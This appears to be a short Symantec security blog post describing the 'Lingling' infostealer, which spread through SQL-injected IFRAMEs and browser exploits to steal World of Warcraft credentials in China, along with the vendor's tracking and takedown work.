One of the principles behind malware is that it follows technology and mainstream culture. If ninety percent of the world was using the EricOS, the vast majority of threats would be designed to run on the EricOS because otherwise the threat would have nothing to infect.
In China, online computer usage patterns affect the types of malware Symantec sees there. In particular, if you walk into an Internet cafe in China, rarely do you see people using search engines like Google or on Web sites like MySpace. Instead, the vast majority of people have headphones on and are playing online games such as Lineage or World of Warcraft.
Thus, Symantec sees a lot of Infostealers that attempt to steal credentials for these types of online games. Once credentials are stolen, the hacker logs into the account, steals the virtual items, and then attempts to sell them for real money through various boards outside the virtual gaming world.
An example of this threat is Lingling (Lingling means zero-zero in English). Lingling was spread by hackers using SQL injection to place a small HTML IFRAME within hacked Web sites. These IFRAMEs would cause the browser to load Javascript that contained a variety of Internet Explorer exploits that eventually downloaded and executed Lingling. The hackers behind Lingling appear to be the same as those who placed an IFRAME in the Dolphins Stadium Web site in the Superbowl infection to download a similar executable. Once Lingling is installed, it waits for you to play World of Warcraft and then scans memory for your credentials and sends them off to the hacker.
We've been tracking how these hackers work including sending down shutdown notices for their executable distribution sites and attempting to notify Web sites that were hacked. In addition, we've put together a video describing how the threat works for our Chinese readers. Watch the video of Robert Wang describing Lingling below.